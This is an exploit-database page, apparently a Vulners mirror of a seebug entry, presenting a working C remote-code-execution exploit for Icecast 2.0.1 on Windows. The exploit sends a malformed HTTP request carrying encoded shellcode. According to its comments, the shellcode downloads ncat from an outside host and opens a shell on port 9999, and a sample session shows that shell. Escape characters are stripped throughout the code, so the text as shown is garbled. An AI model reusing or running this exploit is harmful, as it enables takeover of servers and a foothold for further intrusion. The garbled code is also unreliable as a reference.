Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Icecast <= 2.0.1 Win32 Remote Code Execution Exploit

🗓️ 06 Oct 2004 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 28 Views

Icecast 2.0.1 Win32 exploit allows remote code execution via malformed data to localhost port 8000.

Code

                                                /* 

by Luigi Auriemma 

Shellcode add-on by Delikon 
www.Delikon.de 

Because of all the forbidden bytes in a http get request 
i had to use a very small shellcode, which was blown up 
by Msf::Encoder::PexAlphaNum. Great encoder. 
------------------------------------------------------------------------- 
C:>iceexec 127.0.0.1 

Icecast <= 2.0.1 Win32 remote code execution 0.1 
by Luigi Auriemma 
e-mail: [email protected] 
web:http://aluigi.altervista.org 

shellcode add-on by Delikon 
www.delikon.de 

- target 127.0.0.1:8000 
- send malformed data 

Server IS vulnerable!!! 


C:>nc 127.0.0.1 9999 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:Icecast2 Win32> 
--------------------------------------------------------------------------- 


*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include <winsock.h> 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include <unistd.h> 
    #include <sys/socket.h> 
    #include <sys/types.h> 
    #include <arpa/inet.h> 
    #include <netdb.h> 
    #include <netinet/in.h> 
#endif 

#define VER "0.1" 
#define PORT 8000 
#define BUFFSZ2048 
#define TIMEOUT 3 
#define EXEC"GET / HTTP/1.0rn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "xcc" 
//web download and execution shellcode 
//which downloads http://www.elitehaven.net/ncat.exe 
//this ncat spwans a shell on port 9999 
char shellcode[] = "xEB" 
"x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" 
"x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" 
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" 
"x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" 
"x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" 
"x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" 
"x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" 
"x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" 
"x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" 
"x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" 
"x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" 
"x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" 
"x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" 
"x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" 
"x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" 
"x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" 
"x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" 
"x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" 
"x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" 
"x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" 
"x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" 
"x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" 
"x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" 
"x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" 
"x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" 
"x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" 
"x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" 
"x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" 
"x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" 
"x36x4Ax37x45x46x42x50x5A"; 


/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or doing any other annoying operation because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


int startWinsock(void) 
{ 
  WSADATA wsa; 
  return WSAStartup(MAKEWORD(2,0),&wsa); 
} 

int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

int main(int argc, char *argv[]) { 
    structsockaddr_in peer; 
    int sd; 
    u_short port = PORT; 
    u_charbuff[BUFFSZ]; 
UCHAR buf[4096]; 
UCHAR *pointer=NULL; 


    setbuf(stdout, NULL); 

    fputs("n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"n" 
        "by Luigi Auriemman" 
        "e-mail: [email protected]" 
        "web:http://aluigi.altervista.orgn" 
  "nshellcode add-on by Delikonn" 
  "www.delikon.de" 
        "n", stdout); 

    if(argc < 2) { 
        printf("nUsage: %s <server> [port(%d)]n" 
            "n" 
            "Note: This exploit will force the Icecast server to download NCATn" 
            "and after execution it will spwan a shell on 9999n" 
            "n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32 

    startWinsock(); 
#endif 

    if(argc > 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
pointer =strrchr(buf,0xcc); 

strcpy(pointer,shellcode); 

strcat(buf,"rn"); 
strcat(buf,"rn"); 
    

    printf("n- target %s:%hun", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    fputs("- send malformed datan", stdout); 
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("nServer IS vulnerable!!!nn", stdout); 
    } else { 
        fputs("nServer doesn't seem vulnerablenn", stdout); 
    } 

    close(sd); 
    return(0); 
} 

int timeout(int sock) { 
    structtimeval tout; 
    fd_setfd_read; 
    int err; 

    tout.tv_sec = TIMEOUT; 
    tout.tv_usec = 0; 
    FD_ZERO(&fd_read); 
    FD_SET(sock, &fd_read); 
    err = select(sock + 1, &fd_read, NULL, NULL, &tout); 
    if(err < 0) std_err(); 
    if(!err) return(-1); 
    return(0); 
} 

u_long resolv(char *host) { 
    structhostent *hp; 
    u_longhost_ip; 

    host_ip = inet_addr(host); 
    if(host_ip == INADDR_NONE) { 
        hp = gethostbyname(host); 
        if(!hp) { 
            printf("nError: Unable to resolve hostname (%s)n", host); 
            exit(1); 
        } else host_ip = *(u_long *)(hp->h_addr); 
    } 
    return(host_ip); 
} 

#ifndef WIN32 
    void std_err(void) { 
        perror("nError"); 
        exit(1); 
    } 
#endif 

// sebug.net

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Oct 2004 00:00Current
7.1High risk
Vulners AI Score7.1
icecast vulnerabilityremote code executionwin32 exploitluigi auriemmadelikon shellcode.
28